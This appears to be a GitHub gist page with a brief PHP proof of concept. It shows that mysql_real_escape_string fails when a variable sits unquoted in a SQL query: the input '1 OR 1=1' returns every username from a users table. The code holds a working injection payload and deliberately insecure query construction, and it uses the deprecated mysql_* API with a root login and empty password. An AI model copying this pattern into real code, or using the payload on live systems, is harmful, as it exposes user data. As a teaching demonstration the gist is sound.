This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Proof of Concept - mysql_real_escape_string SQL Injection Exploit Result | |
| Returns ALL Db records due to missing quotes around variable in query | |
| <?php | |
| $con = mysql_connect("localhost", "root", ""); | |
| mysql_select_db("users"); | |
| $id= '1 OR 1=1'; | |
| $escaped_id = mysql_real_escape_string($id); | |
| $result = mysql_query("SELECT * from users WHERE user_id = $escaped_id"); | |
| echo "<h2>I have been hacked!</h2>"; | |
| while ($row = mysql_fetch_array($result)) { | |
| echo $row['username']."<br>"; | |
| } |
by